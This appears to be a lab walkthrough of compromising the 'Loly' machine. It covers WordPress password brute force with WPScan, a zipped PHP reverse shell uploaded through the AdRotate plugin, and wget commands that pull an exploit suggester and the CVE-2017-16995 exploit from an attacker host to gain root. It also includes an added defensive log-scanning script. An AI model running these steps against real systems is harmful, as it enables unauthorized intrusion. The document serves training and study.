NETWORK

ENUMERATION

Visiting Wordpress

Running a directory brute force, we found /wordpress.

Visiting this folder, we get a broken WordPress instance.

Looking at the response headers, we can see the hostname loly.lc.

Adding this domain to our /etc/hosts,

we then have access to a working WordPress website.

FOOTHOLD

User brute force

A WPScan run revealed a user “loly”.

Fortunately, running a password brute force against the user loly revealed the password associated with this user:

wpscan --url http://loly.lc/wordpress --disable-tls-checks --no-banner --no-update -U loly -P /usr/share/wordlists/rockyou.txt

Abusing Adrotate plugin

Using the following wpscan command,

wpscan --url http://loly.lc/wordpress --enumerate vp,vt,u,cb,dbe,u1-10 --detection-mode aggressive --no-banner --no-update

we found the following results,

and in particular a vulnerability in the AdRotate plugin.

Unfortunately, none of the vulnerabilities reported by the scan were exploitable because of the installed plugin version (5.8.6.2).

Luckily, we noticed that we were allowed to upload a Zip file via the plugin. For any Zip file uploaded, the plugin unzips the archive on the server (in the upload folder).

After zipping a reverse shell (http://pentestmonkey.net/tools/php-reverse-shell)

zip -r php-reverse-shell.zip php-reverse-shell.php

and uploading the Zip file to the server,

we were able to reach the extracted file on the server

and catch a reverse shell on our local machine.
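As an added defender-side example (not part of the original writeup): a small Python scanner over constructed Apache-style access-log lines that flags the two behaviours this section relies on, a burst of POSTs to wp-login.php (password brute force) and a request for a PHP file under wp-content/uploads (a script extracted into the media folder). The log lines, IP addresses and the threshold are constructed assumptions.

```python
import re
from collections import Counter

# Constructed Apache-style access-log lines (not from the original writeup):
# one client making many POSTs to wp-login.php, then requesting a PHP file
# under wp-content/uploads; a second client fetching a normal image.
SAMPLE_LOG = "\n".join(
    ['10.0.0.5 - - [10/Oct/2023:12:00:%02d +0000] '
     '"POST /wordpress/wp-login.php HTTP/1.1" 200 4321' % i for i in range(12)]
    + ['10.0.0.5 - - [10/Oct/2023:12:01:05 +0000] '
       '"GET /wordpress/wp-content/uploads/php-reverse-shell.php HTTP/1.1" 200 0',
       '10.0.0.9 - - [10/Oct/2023:12:02:00 +0000] '
       '"GET /wordpress/wp-content/uploads/2023/10/banner.png HTTP/1.1" 200 8812']
)

# Combined-log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# The uploads directory should only serve static media; any PHP-like
# extension below it is suspicious (covers .php, .php7, .phtml, .phar).
UPLOADS_PHP_RE = re.compile(r'/wp-content/uploads/.*\.ph(?:p\d?|tml|ar)$', re.IGNORECASE)


def parse(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(log_text, login_threshold=10):
    """Return (brute_force_ips, uploads_php_hits).

    brute_force_ips: {ip: count} for IPs with >= login_threshold POSTs to wp-login.php
    uploads_php_hits: [(ip, path)] for requests to PHP files under wp-content/uploads
    """
    login_posts = Counter()
    uploads_hits = []
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0]  # drop the query string
        if rec["method"] == "POST" and path.endswith("/wp-login.php"):
            login_posts[rec["ip"]] += 1
        if UPLOADS_PHP_RE.search(path):
            uploads_hits.append((rec["ip"], path))
    brute = {ip: n for ip, n in login_posts.items() if n >= login_threshold}
    return brute, uploads_hits


if __name__ == "__main__":
    brute, hits = analyse(SAMPLE_LOG)
    for ip, n in brute.items():
        print(f"[!] {n} wp-login.php POSTs from {ip} (possible password brute force)")
    for ip, path in hits:
        print(f"[!] PHP requested from uploads dir: {path} by {ip}")
```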

Shell as Loly

While on the server, looking into the WordPress configuration, we found Loly's user credentials.

PRIV ESCALATION

Dirtycow vulnerability

A linpeas scan reported the Dirty COW vulnerability as “highly probable” on the machine,

but unfortunately this route wasn't successful for us.

Abusing the eBPF verifier

Using linux-exploit-suggester:

wget http://192.168.49.204/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh

bash linux-exploit-suggester.sh | tee -a linux-exploit-suggester

We discovered CVE-2017-16995, which allows bypassing the BPF verifier (verifier.c), loading BPF code, and creating a read/write primitive.

After uploading the exploit to the victim machine

wget http://192.168.49.204/45010.c

we gained a root shell by compiling and running the exploit:

PATH=/usr/include/linux:$PATH gcc 45010.c -o exploit